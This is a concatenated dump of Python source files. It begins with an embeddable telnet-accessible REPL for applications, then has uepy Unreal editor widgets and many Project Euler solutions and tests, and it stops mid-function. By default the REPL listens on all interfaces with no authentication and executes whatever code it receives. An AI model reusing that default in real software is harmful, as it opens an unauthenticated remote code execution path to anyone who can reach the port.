Embeddable read-eval-print loop for Python applications. Example usage:

# during application startup
repl = RemoteREPL() # optionally pass in listen host and/or port

# call this often during app lifetime
repl.Process()

To connect use telnet or:
python -m telnetlib 127.0.0.1 9999 # or other host/port as needed

Notes:
- For applications that have restrictions on what can be run from non-main threads, be sure to
call repl.Process from the appropriate thread (e.g. a game's main thread)
- TODO: support _ for last-result shortcut
'''

import code, time, threading, sys, socketserver, selectors, traceback, queue

# patchable - TODO use python logging
log = print
def logTB():
    # Log the current exception's traceback one line at a time through `log`
    for line in traceback.format_exc().split('\n'):
        log(line)

class RemoteREPL(socketserver.TCPServer):
    # A TCP server exposing an interactive console. Commands arrive via `incoming`
    # (fed by REPLRequestHandler on the server thread) and are executed on whatever
    # thread calls Process(); output is queued on `outgoing` for the handler to send.
    def __init__(self, host='', port=9999, env=None): # env is e.g. globals()
        super().__init__((host, port), REPLRequestHandler)
        # NOTE(review): this overrides the process-global displayhook, so interactive
        # results from *any* console in the process get routed here.
        sys.displayhook = self.SysDisplayHook
        self.incoming = queue.Queue()   # lines of input awaiting execution
        self.outgoing = queue.Queue()   # text awaiting transmission to the client
        self.lastProcess = 0            # timestamp of the last Process() call

        class EmbeddedConsole(code.InteractiveConsole):
            def write(self, value):
                '''called on errors/tracebacks'''
                self.server.outgoing.put(value + '\n')

        if env is None:
            env = globals()
        self.console = EmbeddedConsole(env)
        self.console.server = self
        # The accept loop runs on a daemon thread so it dies with the application
        t = threading.Thread(target=self.serve_forever)
        t.daemon = True
        t.start()

    def SysDisplayHook(self, value):
        '''called on interactive writes to sys.stdout'''
        if value is not None:
            self.outgoing.put(repr(value)+'\n')

    def Process(self):
        '''Should be called periodically from the application's main thread to execute the next
        waiting command, if any'''
        now = time.time()
        # NOTE(review): `since` is computed but never used - left in place intentionally
        since = now - self.lastProcess
        self.lastProcess = now
        try:
            try:
                # NOTE(review): `next` shadows the builtin within this scope
                next = self.incoming.get_nowait()
                more = self.console.push(next)
                # echo back a different prompt based on whether or not we detected the command as complete
                if more:
                    self.outgoing.put('... ')
                else:
                    self.outgoing.put('>>> ')
            except queue.Empty:
                pass
        except:
            logTB()

class REPLRequestHandler(socketserver.BaseRequestHandler):
    # Per-connection handler: shuttles bytes between the socket and the server's queues
    def OnReadable(self, sock):
        '''Reads any incoming input from the remote side and enqueues it for a call to Process'''
        # TODO: use recv_into, a buffer, etc. instead of += strings
        more = sock.recv(4096)
        if not more:
            # Empty read means the peer closed the connection
            self.keepRunning = False
        else:
            self.readBuffer += more.decode('utf8')
            if '\n' in self.readBuffer:
                line, self.readBuffer = self.readBuffer.split('\n', 1)
                if line.strip() == 'exit()':
                    # Special case: instead of shutting down the whole process, just disconnect
                    self.keepRunning = False
                else:
                    self.server.incoming.put(line)

    def handle(self):
        '''Reads/writes data until the connection closes'''
        self.readBuffer = ''
        self.keepRunning = True
        selector = selectors.DefaultSelector()
        selector.register(self.request, selectors.EVENT_READ, self.OnReadable)
        log('REPL starting')
        self.server.outgoing.put('Connected to remote REPL\n')
        self.server.outgoing.put('>>> ')
        try:
            while self.keepRunning:
                # Poll for input with a short timeout so queued output is flushed promptly
                for key, mask in selector.select(0.05):
                    key.data(key.fileobj)

                # Send queued output
                while 1:
                    try:
                        out = self.server.outgoing.get_nowait()
                        self.request.sendall(out.encode('utf8'))
                    except queue.Empty:
                        break
        finally:
            log('REPL quitting')

if __name__ == '__main__':
    repl = RemoteREPL()
    while 1:
        repl.Process()
        time.sleep(0.1)
dfb/uepy
Content/Scripts/uepy/editor_spawner.py
# Creates a tab/window in the editor for spawning Python-based actors
import uepy, time
from uepy import umg, editor
from uepy import log, logTB

class SpawnerTab(uepy.UUserWidget_PGLUE):
    '''Editor tab listing spawnable Python actor classes, with Spawn/Refresh buttons.'''
    def __init__(self):
        # unique-ish id for this tab instance
        self.num = int(time.time())

    def Construct(self, vboxRoot):
        '''Builds the widget hierarchy inside the provided root vertical box.'''
        log('editor_spawner.SpawnerTab.Construct:', vboxRoot)
        vboxRoot = umg.UVerticalBox.Cast(vboxRoot)
        margin = uepy.FMargin(5,5,5,5)

        # Row: combo box of class names + refresh button
        hb = umg.UHorizontalBox.Cast(umg.CreateWidget(vboxRoot, umg.UHorizontalBox, 'hb'))
        slot = umg.UVerticalBoxSlot.Cast(vboxRoot.AddChild(hb))
        slot.SetPadding(margin)

        self.comboBox = umg.UComboBoxString.Cast(umg.CreateWidget(hb, umg.UComboBoxString, 'comboBox'))
        self.comboBox.SetFontSize(11)
        umg.UHorizontalBoxSlot.Cast(hb.AddChild(self.comboBox)).SetPadding(margin)
        self.RepopulateClassList()
        self.comboBox.BindOnSelectionChanged(self.OnSelectionChanged)

        spawnButton = umg.UButton.Cast(umg.CreateWidget(hb, umg.UButton, 'spawnButton'))
        umg.UHorizontalBoxSlot.Cast(hb.AddChild(spawnButton)).SetPadding(margin)
        label = umg.UTextBlock.Cast(umg.CreateWidget(spawnButton, umg.UTextBlock, 'textblock'))
        label.SetText('Spawn')
        label.SetFontSize(11)
        spawnButton.SetContent(label)
        spawnButton.BindOnClicked(self.OnSpawnClicked)

        refreshButton = umg.UButton.Cast(umg.CreateWidget(hb, umg.UButton, 'refreshButton'))
        umg.UHorizontalBoxSlot.Cast(hb.AddChild(refreshButton)).SetPadding(margin)
        label = umg.UTextBlock.Cast(umg.CreateWidget(refreshButton, umg.UTextBlock, 'textblock'))
        label.SetText('Refresh')
        label.SetFontSize(11)
        refreshButton.SetContent(label)
        refreshButton.BindOnClicked(self.OnRefreshClicked)

        if 0: # disabled branch kept for reference
            # Row: checkbox (delete old instances) + text
            hb = umg.UHorizontalBox.Cast(umg.CreateWidget(vboxRoot, umg.UHorizontalBox, 'hb2'))
            slot = umg.UVerticalBoxSlot.Cast(vboxRoot.AddChild(hb))
            slot.SetPadding(margin)
            self.locationCheckbox = umg.UCheckBox.Cast(umg.CreateWidget(hb, umg.UCheckBox, 'checkbox'))
            umg.UHorizontalBoxSlot.Cast(hb.AddChild(self.locationCheckbox)).SetPadding(margin)
            self.locationCheckbox.SetIsChecked(True)
            self.hackCheck = self.locationCheckbox.BindOnCheckStateChanged(self.OnCheckStateChanged)
            label = umg.UTextBlock.Cast(umg.CreateWidget(hb, umg.UTextBlock, 'label'))
            slot = umg.UHorizontalBoxSlot.Cast(hb.AddChild(label))
            slot.SetVerticalAlignment(uepy.enums.EVerticalAlignment.Center)
            slot.SetPadding(margin)
            label.SetText('Delete old instances before spawning')
        else:
            # msg telling them to use sourcewatcher
            hb = umg.UHorizontalBox.Cast(umg.CreateWidget(vboxRoot, umg.UHorizontalBox, 'hb2'))
            slot = umg.UVerticalBoxSlot.Cast(vboxRoot.AddChild(hb))
            slot.SetPadding(margin)
            # FIX: removed a stray 'label.SetFontSize(11)' that ran *before* the new label was
            # created below - it was re-styling the refresh button's label left over in `label`.
            label = umg.UTextBlock.Cast(umg.CreateWidget(hb, umg.UTextBlock, 'label'))
            label.SetFontSize(11)
            slot = umg.UHorizontalBoxSlot.Cast(hb.AddChild(label))
            slot.SetVerticalAlignment(uepy.enums.EVerticalAlignment.Center)
            slot.SetPadding(margin)
            label.SetText('Instead of using this spawner, ask dave about using sourcewatcher!')

    def RepopulateClassList(self):
        '''Refills the combo box with all Python engine subclasses that derive from a glue class.'''
        self.comboBox.ClearOptions()
        _classes = list(uepy.GetPythonEngineSubclasses().values())
        glueClasses = uepy.GetAllGlueClasses() # TODO: filter out glue classes for widgets
        classes = []
        for klass in _classes:
            # TODO: there's got to be a better way than this
            foundGlueBase = False
            for gc in glueClasses:
                if issubclass(klass, gc):
                    foundGlueBase = True
                    break
            if foundGlueBase:
                classes.append(klass)
        # sort by unqualified class name
        classes.sort(key=lambda x:x.__name__.split('.')[-1])
        self.classes = classes
        for c in classes:
            self.comboBox.AddOption(c.__name__.split('.')[-1])
        self.comboBox.SetSelectedIndex(0)

    def OnRefreshClicked(self, *args, **kwargs):
        # TODO: we're only refreshing the list, not triggering any modules to reload
        self.RepopulateClassList()

    def OnSpawnClicked(self, *args, **kwargs):
        '''Spawns the currently selected class into the editor world and selects it.'''
        editor.DeselectAllActors()
        world = editor.GetWorld() # TODO: how about just uepy.GetWorld to allow spawning during PIE too?
        index = max(0,self.comboBox.GetSelectedIndex())
        klass = self.classes[index]
        actor = uepy.SpawnActor(world, klass)
        editor.SelectActor(actor)

    def OnSelectionChanged(self, *args, **kwargs):
        log('ON SELCH', self, args, kwargs)

    def OnCheckStateChanged(self, *args, **kwargs):
        log('ON CHECK', self, args, kwargs)

editor.RegisterNomadTabSpawner(SpawnerTab, 'uepy Spawner')

'''
UEditableTextBox
    SEditableTextBox w/ hint_text
'''
dfb/uepy
Content/Scripts/uepy/umg.py
<reponame>dfb/uepy from _uepy import * from _uepy._umg import *
dfb/uepy
Content/Scripts/uepy/editor.py
from _uepy import * from _uepy._editor import *
cgnik/euler
src/py/util/nth.py
def nth(test, items): if test > 0: test -= 1 else: test = 0 for i, v in enumerate(items): if i == test: return v
cgnik/euler
src/py/problem26.py
# A unit fraction contains 1 in the numerator. The decimal representation of the unit fractions with denominators 2 to 10 are given: # # 1/2 = 0.5 # 1/3 = 0.(3) # 1/4 = 0.25 # 1/5 = 0.2 # 1/6 = 0.1(6) # 1/7 = 0.(142857) # 1/8 = 0.125 # 1/9 = 0.(1) # 1/10 = 0.1 # Where 0.1(6) means 0.166666..., and has a 1-digit recurring cycle. It can be seen that 1/7 has a 6-digit recurring cycle. # # Find the value of d < 1000 for which 1/d contains the longest recurring cycle in its decimal fraction part. from util.repeats import unit_fraction_cycle max_precision = 4096 def problem26(): candidates = [] print("Problem 26: Unit fraction cycles") for x in range(7, 1000): print(f"\rcalculating cycles: {int(x / 10)}%", end='', flush=True) cycle = unit_fraction_cycle(x, max_precision) if cycle != '': candidates.append((x, cycle)) candidates = list(filter(lambda x: x[1] != '', candidates)) candidates = [(len(c[1]), c[0], c[1]) for c in candidates] candidates.sort(reverse=True) print(f"\nCandidates(len {len(candidates)}): {candidates}") print(f"Problem 26 answer: {candidates[0]}") problem26()
cgnik/euler
src/py/util/permutation.py
<filename>src/py/util/permutation.py def permutations(items): # c is an encoding of the stack state. c[k] encodes the for-loop counter for when generate(k+1, A) is called c = [0 for c in range(0, len(items))] yield items # i acts similarly to the stack pointer i = 0 while i < len(items): if c[i] < i: if i % 2 == 0: items[0], items[i] = items[i], items[0] else: items[c[i]], items[i] = items[i], items[c[i]] yield items c[i] += 1 i = 0 else: c[i] = 0 i += 1 def gen_bits(bit_count, max_bits): end = pow(2, max_bits) for i in range(0, end): if bin(i).count('1') == bit_count: yield i def combinations(people, seat_count=0): people_count = len(people) if seat_count < 1: seat_count = len(people) # assumption: len(people) >= seats # strategy: use a bit to rep a single person # generate all possible numbers with bit array of len(people) # find all values in that list with seat_count bits turned on # map back onto people and output bits_format = "{0:>0" + str(people_count) + "b}" results = [] for combo in gen_bits(seat_count, len(people)): result = [] for i in range(people_count - 1, -1, -1): if (1 << i) & combo: result.append(people[i]) results.append(result) return results def permute(a, k): # heap's algorithm if k == 1: yield a.copy() else: yield from permute(a, k - 1) for i in range(0, k - 1): target = 0 if k % 2 == 0: target = i - 1 a[target], a[i] = a[i], a[target] yield from permute(a, k - 1) def permute_all(a): return permute(a, len(a)) def permute_all_combinations(a, length): results = [] for c in combinations(a, length): results += permute_all(c) return set(map(tuple, results))
cgnik/euler
src/py/problem22.py
# https://projecteuler.net/problem=22 # Using names.txt (right click and 'Save Link/Target As...'), a 46K text file containing over five-thousand first names, begin by sorting it into alphabetical order. Then working out the alphabetical value for each name, multiply this value by its alphabetical position in the list to obtain a name score. # # For example, when the list is sorted into alphabetical order, COLIN, which is worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. So, COLIN would obtain a score of 938 ร— 53 = 49714. # # What is the total of all the name scores in the file? import string def problem22(): names = None with open("p022_names.txt") as f: names = f.read().replace('"', '').split(',') names.sort() letters = [' '] + [a for a in string.ascii_uppercase] def score(s): return sum(map(lambda x: letters.index(x), [a for a in s])) answer = [] for i in range(0, len(names)): sc = score(names[i]) answer.append(sc * (i + 1)) print(f"Problem 22 answer: {sum(answer)}") problem22()
cgnik/euler
src/py/problem17.py
from num2words import num2words def problem17(): print(f"Problem 17: {sum([len(num2words(a).replace(' ', '').replace('-', '')) for a in range(1,1001)])}") problem17()
cgnik/euler
src/py/util/factoring.py
<gh_stars>0 from math import sqrt from util.divisible import divisible_by def factors(num): n = num yield 1 for x in [2, 3, 5, 7]: while n % x == 0: n = int(n / x) yield x f = 11 while f <= int(sqrt(n)): if n % f == 0: yield f while n % f == 0: n = int(n / f) f += 2 # compensate for 22/11 problem if num % n == 0: yield n yield num def is_prime(x, lower_primes): divisors = filter(lambda b: b <= int(x / 2), lower_primes) return not divisible_by(x, divisors) def is_prime_quick(x): if x <= 3: return x > 1 elif x % 2 == 0 or x % 3 == 0: return False i = 5 while i * i <= x: # while i * 3 <= x: // works exactly the same as above, though more cycles if x % i == 0: return False i += 2 return True
cgnik/euler
src/py/problem11.py
import numpy as np

from matrix import flipdiag, groups

# grid is 20x20 to begin
# (the raw Euler problem 11 grid, flattened row-major)
matrix = np.array([8, 2, 22, 97, 38, 15, 0, 40, 0, 75, 4, 5, 7, 78, 52, 12, 50, 77, 91, 8,
                   49, 49, 99, 40, 17, 81, 18, 57, 60, 87, 17, 40, 98, 43, 69, 48, 4, 56, 62, 0,
                   81, 49, 31, 73, 55, 79, 14, 29, 93, 71, 40, 67, 53, 88, 30, 3, 49, 13, 36, 65,
                   52, 70, 95, 23, 4, 60, 11, 42, 69, 24, 68, 56, 1, 32, 56, 71, 37, 2, 36, 91,
                   22, 31, 16, 71, 51, 67, 63, 89, 41, 92, 36, 54, 22, 40, 40, 28, 66, 33, 13, 80,
                   24, 47, 32, 60, 99, 3, 45, 2, 44, 75, 33, 53, 78, 36, 84, 20, 35, 17, 12, 50,
                   32, 98, 81, 28, 64, 23, 67, 10, 26, 38, 40, 67, 59, 54, 70, 66, 18, 38, 64, 70,
                   67, 26, 20, 68, 2, 62, 12, 20, 95, 63, 94, 39, 63, 8, 40, 91, 66, 49, 94, 21,
                   24, 55, 58, 5, 66, 73, 99, 26, 97, 17, 78, 78, 96, 83, 14, 88, 34, 89, 63, 72,
                   21, 36, 23, 9, 75, 0, 76, 44, 20, 45, 35, 14, 0, 61, 33, 97, 34, 31, 33, 95,
                   78, 17, 53, 28, 22, 75, 31, 67, 15, 94, 3, 80, 4, 62, 16, 14, 9, 53, 56, 92,
                   16, 39, 5, 42, 96, 35, 31, 47, 55, 58, 88, 24, 0, 17, 54, 24, 36, 29, 85, 57,
                   86, 56, 0, 48, 35, 71, 89, 7, 5, 44, 44, 37, 44, 60, 21, 58, 51, 54, 17, 58,
                   19, 80, 81, 68, 5, 94, 47, 69, 28, 73, 92, 13, 86, 52, 17, 77, 4, 89, 55, 40,
                   4, 52, 8, 83, 97, 35, 99, 16, 7, 97, 57, 32, 16, 26, 26, 79, 33, 27, 98, 66,
                   88, 36, 68, 87, 57, 62, 20, 72, 3, 46, 33, 67, 46, 55, 12, 32, 63, 93, 53, 69,
                   4, 42, 16, 73, 38, 25, 39, 11, 24, 94, 72, 18, 8, 46, 29, 32, 40, 62, 76, 36,
                   20, 69, 36, 41, 72, 30, 23, 88, 34, 62, 99, 69, 82, 67, 59, 85, 74, 4, 36, 16,
                   20, 73, 35, 29, 78, 31, 90, 1, 74, 31, 49, 71, 48, 86, 81, 16, 23, 57, 5, 54,
                   1, 70, 54, 71, 83, 51, 54, 69, 16, 92, 33, 48, 61, 43, 52, 1, 89, 19, 67, 48], dtype=np.int64)

# dim = length of square matrix side; w = width of summable array
def problem11(dim, w):
    """Find the largest product of w adjacent numbers (any direction) in the dim x dim grid."""
    m = matrix.reshape(dim, dim)
    f = np.flip(m, axis=1)
    # sliding windows of width w along rows, columns, and both diagonal directions
    h = groups(m, w)
    v = groups(m.transpose(), w)
    dh = groups(flipdiag(m, dim), w)
    dv = groups(flipdiag(f, dim), w)
    # for dd in dv:
    #     print("|".join([f"( {x:.0f},)" for x in dd]))
    all = [h, v, dh, dv]
    # product of each window, then the best window per direction
    products = [a.prod(axis=1, dtype=np.int64) for a in all]
    max_indices = [np.argmax(a) for a in products]
    max_values = [products[idx][x] for idx, x in enumerate(max_indices)]
    max_factors = [all[idx][x] for idx, x in enumerate(max_indices)]
    print(f"indices: {max_indices}: values: {max_values}: factors: {max_factors}")

problem11(20, 4)
cgnik/euler
src/py/util/test_collatz.py
<gh_stars>0 from unittest import TestCase from util.collatz import collatz, collatz_series class Test_collatz(TestCase): def test_collatz(self): self.assertEqual(collatz(13), 40) self.assertEqual(collatz(40), 20) def test_collatz_series(self): self.assertListEqual(list(collatz_series(13)), [40, 20, 10, 5, 16, 8, 4, 2, 1])
cgnik/euler
src/py/util/test_factors.py
from unittest import TestCase import numpy as np from util.factoring import factors from util.cartesian import all_factors class Test_factors(TestCase): def test_factors(self): self.assertListEqual(listify(factors(1)), [1]) self.assertListEqual(listify(factors(12)), [1, 2, 3, 12]) self.assertListEqual(listify(factors(8)), [1, 2, 8]) self.assertListEqual(listify(factors(9)), [1, 3, 9]) self.assertListEqual(listify(factors(5)), [1, 5]) self.assertListEqual(listify(factors(22)), [1, 2, 11, 22]) self.assertListEqual(listify(factors(25)), [1, 5, 25]) self.assertListEqual(listify(factors(63)), [1, 3, 7, 63]) self.assertListEqual(listify(factors(1210)), [1, 2, 5, 11, 1210]) def test_all_factors(self): self.assertListEqual(listify(all_factors(220)), [1, 2, 4, 5, 10, 11, 20, 22, 44, 55, 110]) self.assertListEqual(listify(all_factors(284)), [1, 2, 4, 71, 142]) self.assertListEqual(listify(all_factors(1210)), [1, 2, 5, 10, 11, 22, 55, 110, 121, 242, 605]) self.assertListEqual(listify(all_factors(11132)), [1, 2, 4, 11, 22, 23, 44, 46, 92, 121, 242, 253, 484, 506, 1012, 2783, 5566]) def listify(gen): x = list(np.unique(np.array([f for f in gen]))) x.sort() return x
cgnik/euler
src/py/util/test_fibonacci.py
from unittest import TestCase from util.fibonacci import fibonacci class Test_fibonacci(TestCase): def test_fibonacci(self): def nth_fibonacci(n): count = 0 for f in fibonacci(): count += 1 if count >= n: break; return f self.assertEqual(21, nth_fibonacci(8)) self.assertEqual(144, nth_fibonacci(12))
cgnik/euler
src/py/problem33.py
<reponame>cgnik/euler # https://projecteuler.net/problem=33 # # The fraction 49/98 is a curious fraction, as an inexperienced mathematician in attempting to simplify it may incorrectly believe that 49/98 = 4/8, which is correct, is obtained by cancelling the 9s. # # We shall consider fractions like, 30/50 = 3/5, to be trivial examples. # # There are exactly four non-trivial examples of this type of fraction, less than one in value, and containing two digits in the numerator and denominator. # # If the product of these four fractions is given in its lowest common terms, find the value of the denominator. from functools import reduce from operator import mul all_nums = [f"{x}" for x in range(11, 100) if x % 10 != 0] def problem33(): combos = [(a, b) for a in all_nums for b in all_nums] answers = [] for i in range(1, 10): si = f"{i}" for x, y in list(filter(lambda z: si in f"{z[0]}" and si in f"{z[1]}", combos)): if x == y or x.strip(si) == '' or y.strip(si) == '': continue p, d = float(f"{x}".strip(si)), float(f"{y}".strip(si)) if (p / d) > 1: continue if (float(x) / float(y)) == (p / d): answers.append((x, y)) n, d = [int(n[0]) for n in answers], [int(n[1]) for n in answers] pn, pd = reduce(mul, n), reduce(mul, d) print(f"numerator: {pn} denominator: {pd} Done.") problem33()
cgnik/euler
src/py/util/test_abundant.py
from unittest import TestCase from util.abundant import abundant_numbers, contains_sum_for class Test_abundants(TestCase): test_data1 = [] test_data2 = [[1, 2], [3, 4]] test_data3 = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] # def test_abundants_wierdos(self): # # [1, 2, 4, 11, 22, 44, 121, 242, 253, 484, 506, 1012, 2783, 5566] # # [1, 2, 4, 11, 22, 23, 44, 46, 92, 121, 242, 253, 484, 506, 1012, 2783, 5566] # abundants = abundant_numbers(11493) # self.assertTrue(11132 in abundants) # self.assertTrue(11492 in abundants) # def test_abundants(self): self.assertListEqual(abundant_numbers(270), [12, 18, 20, 24, 30, 36, 40, 42, 48, 54, 56, 60, 66, 70, 72, 78, 80, 84, 88, 90, 96, 100, 102, 104, 108, 112, 114, 120, 126, 132, 138, 140, 144, 150, 156, 160, 162, 168, 174, 176, 180, 186, 192, 196, 198, 200, 204, 208, 210, 216, 220, 222, 224, 228, 234, 240, 246, 252, 258, 260, 264, 270]) def test_contains_sum_for(self): self.assertTrue(contains_sum_for(3, [1, 2])) self.assertFalse(contains_sum_for(3, [2, 2])) self.assertTrue(contains_sum_for(15, [1, 2, 3, 4, 5, 10, 20, 30, 40])) self.assertTrue(contains_sum_for(15, [1, 2, 3, 4, 5, 13, 20, 30, 40])) self.assertFalse(contains_sum_for(15, [1, 2, 3, 4, 5, 20, 30, 40])) self.assertTrue(contains_sum_for(24, [12, 17, 20])) self.assertTrue(contains_sum_for(7141, [1, 444, 7723, 7140, 8002])) self.assertTrue(contains_sum_for(34, [12, 17, 20])) self.assertFalse(contains_sum_for(19, [12, 13, 14, 15, 17, 20])) self.assertFalse(contains_sum_for(11132, [])) self.assertFalse(contains_sum_for(11492, []))
cgnik/euler
src/py/util/spiral.py
import numpy as np def spiral_diagonals(length): return list(diagonal_values(2 * length - 1)) def diagonal_values(cycles): offset = 2 cycle = 0 previous = 1 yield previous while cycle + 1 < cycles: cycle += 1 previous += offset if cycle % 4 == 0: offset += 2 yield previous return
cgnik/euler
src/py/util/grids.py
import numpy as np def get_sticks(grid): if len(grid.shape) != 2: return [] rows, columns = grid.shape sticks = [] for x in range(0, columns): for y in range(0, rows): if x < columns - 1: sticks.append((grid[y][x], grid[y][x + 1])) if y < rows - 1: sticks.append((grid[y][x], grid[y + 1][x])) return sticks def routes_matching(start, routes, idx): return filter(lambda x: x[idx] == start, routes) def join_path(t1, t2): return tuple(j for i in (t1, t2[1]) for j in (i if isinstance(i, tuple) else (i,))) def gen_paths(data): grid = np.array(data) sticks = get_sticks(grid) if len(sticks) < 4: # min possible for 2x2 return [] origin = grid[0][0] paths = list(routes_matching(origin, sticks, 0)) while paths[0][-1] != data[-1][-1]: print('.',end='',flush=True) new_paths = [] for path in paths: new_paths.extend([join_path(path, a) for a in routes_matching(path[-1], sticks, 0)]) paths = new_paths return paths
cgnik/euler
src/py/util/test_permutations.py
<gh_stars>0 from unittest import TestCase from util.permutation import permutations, permute_all, permute, combinations, permute_all_combinations def stringify(arr): response = [''.join([str(a) for a in b]) for b in arr] response.sort() return response class Test_Permutations(TestCase): def test_permutations(self): self.assertListEqual(stringify(permutations([1, 2, 3])), "123,132,213,231,312,321".split(',')) self.assertListEqual(stringify(permutations([0, 1, 2])), "012,021,102,120,201,210".split(',')) def test_permute(self): self.assertListEqual(list(permute_all(list("12"))), [["1", "2"], ["2", "1"]]) self.assertListEqual(list(permute_all(list("123"))), [ ['1', '2', '3'], ['3', '2', '1'], ['3', '2', '1'], ['1', '2', '3'], ['2', '1', '3'], ['3', '1', '2']]) def test_combinations(self): self.assertListEqual(list(combinations(['1', '2'], 1)), [['1'], ['2']]) self.assertListEqual(list(combinations(['1', '2', '3'], 1)), [['1'], ['2'], ['3']]) self.assertListEqual(list(combinations(['1', '2', '3'], 2)), [['2', '1'], ['3', '1'], ['3', '2']]) def test_permute_all_combinations(self): self.assertSetEqual(permute_all_combinations(('1', '2', '3'), 2), { ('1', '2'), ('1', '3'), ('2', '1'), ('2', '3'), ('3', '1'), ('3', '2')})
cgnik/euler
src/py/util/threadsafe_generator.py
<reponame>cgnik/euler<filename>src/py/util/threadsafe_generator.py import threading class ThreadsafeIterator: def __init__(self, it): self.it = it self.lock = threading.Lock() def __iter__(self): return self def __next__(self): with self.lock: return self.it.__next__()
cgnik/euler
src/py/problem10.py
<gh_stars>0 from primerator import Primerator import numpy limit = 2000000 p = Primerator(limit).primes() with open('primes.txt', 'w') as f: f.write('\n'.join(map(lambda x: str(x), p))) print(f"\nSum of primes < {limit}: {numpy.sum(p)}")
cgnik/euler
src/py/problem32.py
<reponame>cgnik/euler # https://projecteuler.net/problem=32 # We shall say that an n-digit number is pandigital if it makes use of all the digits 1 to n exactly once; for example, the 5-digit number, 15234, is 1 through 5 pandigital. # # The product 7254 is unusual, as the identity, 39 ร— 186 = 7254, containing multiplicand, multiplier, and product is 1 through 9 pandigital. # # Find the sum of all products whose multiplicand/multiplier/product identity can be written as a 1 through 9 pandigital. # # HINT: Some products can be obtained in more than one way so be sure to only include it once in your sum. import util.permutation as p numbers = "123456789" def is_pandigital(x, c, p): s = list('{}{}{}'.format(x, c, p)) s.sort() return ''.join(s) == numbers def make_ints(charrays): for a in charrays: yield int(''.join(a)) def problem32(): # strategy: brute force: permutations of "123456789" # broken into 3 strings # strings for the multiplicands must be 1-4 characters, each, no more, # considering that the use of 5 characters on the left of = would # necessitate the presence of no more than 4 on the right, which could # only be true if it was something like 2*4-digit=other-4-digit # this is like a 5 people in 3 chairs problem: factorial(9) / (factorial(9 - 4)) # so there are only 3024 permutations of "123456789" in 4 slots, 504 in 3 slots, # 72 in 2 slots, and 9 in 1 slot, making this brute-forceable assert is_pandigital(39, 186, 39*186) num_list = list(numbers) arg_lists = [list(make_ints(p.permute_all_combinations(num_list, n))) for n in range(1, 5)] # all pairings of arg lists, find products candidates = set() for arg_list in p.combinations(arg_lists, 2): for arga in arg_list[0]: for argb in arg_list[1]: candidates.add((arga, argb, arga * argb)) pandigitals = list(filter(lambda x: is_pandigital(x[0], x[1], x[2]), candidates)) print(f"{pandigitals} Done.") print(f"{sum(set([p[2] for p in pandigitals]))} Done.") problem32()
cgnik/euler
src/py/util/test_distinct_powers.py
from unittest import TestCase from util.distinct_powers import distinct_powers, simplify_exponent class Test_distinct_powers(TestCase): def test_distinct_powers(self): # self.assertSetEqual(distinct_powers(2, 5), {4, 8, 9, 16, 25, 27, 32, 64, 81, 125, 243, 256, 625, 1024, 3125}) self.assertEqual(distinct_powers(2, 5), 15) def test_simplify_exponent(self): self.assertEqual(simplify_exponent(4, 2), (2, 4)) self.assertEqual(simplify_exponent(9, 2), (3, 4)) self.assertEqual(simplify_exponent(16, 2), (2, 8)) self.assertEqual(simplify_exponent(2, 2), (2, 2)) self.assertEqual(simplify_exponent(7, 7), (7, 7)) self.assertEqual(simplify_exponent(64, 2), (2, 12)) self.assertEqual(simplify_exponent(4, 3), (2, 6))
cgnik/euler
src/py/util/test_digit_exponents.py
<reponame>cgnik/euler from unittest import TestCase from util.digit_exponents import is_power_sum, power_sums class TestDigitExponents(TestCase): def test_is_power_sum(self): self.assertTrue(is_power_sum(1634, 4)) self.assertTrue(is_power_sum(8208, 4)) self.assertTrue(is_power_sum(9474, 4)) self.assertFalse(is_power_sum(5, 4)) self.assertFalse(is_power_sum(8238, 4)) self.assertFalse(is_power_sum(9187324182347, 4)) def test_power_sums(self): self.assertListEqual(list(power_sums(4, 2000)), [1634]) self.assertListEqual(list(power_sums(4, 9000)), [1634, 8208]) self.assertListEqual(list(power_sums(4, 9500)), [1634, 8208, 9474])
cgnik/euler
src/py/util/divisible.py
def is_divisible(a, b): return a % b == 0 def any_divisors(a, bs): if not bs: return False for b in iter(bs): yield is_divisible(a, b) return False def divisible_by(a, bs): return any(any_divisors(a, bs))
cgnik/euler
src/py/problem27.py
<reponame>cgnik/euler<gh_stars>0 # Euler discovered the remarkable quadratic formula: # # n2+n+41 # It turns out that the formula will produce 40 primes for the consecutive integer values 0โ‰คnโ‰ค39. However, when n=40,402+40+41=40(40+1)+41 is divisible by 41, and certainly when n=41,412+41+41 is clearly divisible by 41. # # The incredible formula n2โˆ’79n+1601 was discovered, which produces 80 primes for the consecutive values 0โ‰คnโ‰ค79. The product of the coefficients, โˆ’79 and 1601, is โˆ’126479. # # Considering quadratics of the form: # # n2+an+b, where |a|<1000 and |b|โ‰ค1000 # # where |n| is the modulus/absolute value of n # e.g. |11|=11 and |โˆ’4|=4 # Find the product of the coefficients, a and b, for the quadratic expression that produces the maximum number of primes for consecutive values of n, starting with n=0. from multiprocessing import Process, Pipe, Pool import numpy as np import itertools as it from util.quadratic_primes import sign_combos def problem27(): coefficients = np.arange(0, 1001) with Pool(6) as pool: results = pool.map_async(sign_combos, it.product(coefficients, coefficients)) out = [r for r in results.get() if r[0] > 1] out.sort(reverse=True) print(f"Result count: {len(out)}, max: {max(out)}, out: {out}") print(f"Answer: {out[0][1][0] * out[0][1][1]} with prime count {out[0][0]} and coefficients {out[1]}") print(f"Problem 27: complete") problem27()
cgnik/euler
src/py/problem24.py
<reponame>cgnik/euler # Lexicographic permutations # # Problem 24 # # A permutation is an ordered arrangement of objects. For example, 3124 is one possible permutation of the digits 1, 2, 3 and 4. If all of the permutations are listed numerically or alphabetically, we call it lexicographic order. The lexicographic permutations of 0, 1 and 2 are: # # 012 021 102 120 201 210 # # What is the millionth lexicographic permutation of the digits 0, 1, 2, 3, 4, 5, 6, 7, 8 and 9? from util.permutation import permutations def problem24(): p = [''.join(p) for p in permutations([str(n) for n in range(0, 10)]) if p[0] in "012"] p.sort() print(f"Problem 24: Millionth permutation sorted lexically (total count {len(p)}): {p[999999]}") problem24()
cgnik/euler
src/py/util/quadratic_primes.py
from util.factoring import is_prime_quick

import numpy as np


def expr(n, ab):
    """Evaluate the quadratic n^2 + a*n + b for the coefficient pair ab = (a, b)."""
    return n ** 2 + (ab[0] * n) + ab[1]


def consecutive_primes(ab):
    """Return the smallest n >= 1 for which expr(n, ab) is NOT prime.

    For n^2 + n + 41 this returns 40 (primes for n = 1..39).
    NOTE(review): n = 0 is never tested — expr(0, ab) == b could be
    composite without affecting the result; confirm that is intended.
    """
    n = 0
    while True:
        n += 1
